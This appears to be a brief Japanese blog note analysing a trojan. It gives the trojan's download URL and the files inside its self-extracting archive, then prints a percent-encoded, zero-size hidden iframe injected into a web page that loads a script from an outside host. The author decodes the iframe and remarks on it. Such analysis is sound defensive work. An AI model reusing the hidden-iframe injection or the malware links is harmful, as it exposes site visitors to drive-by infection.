fccja.comのトロイが更新されていました。
http://www.fccja.com/net.exe
cabの自己展開書庫なので展開します。
net.exe
→comine.exe
→svc.exe
comine.exe
svc.exe
いずれかが検知されるとnet.exeそのものがウイルス扱いされる可能性があるため
あまりいい方法とは思えません。
svc.exe
ん?
http://fccja.meibu.com/
| <iframe src=http://%77%77%77%2E%68%65%6C%6C%68%2E%6E%65%74/%68%65%61%64%2E%61%73%70 widtho=0 height=0></iframe> |
ん?
| <iframe src=http://www.hellh.net/head.asp widtho=0 height=0></iframe> |
前に見ました。
ついでに今後のためにエンコードしておきますね。
fccja.meibu.com
%66%63%63%6A%61%2E%6D%65%69%62%75%2E%63%6F%6D
widthの綴りを間違っています。
こんなスクリプトもありました。
ホストがIPになっています。
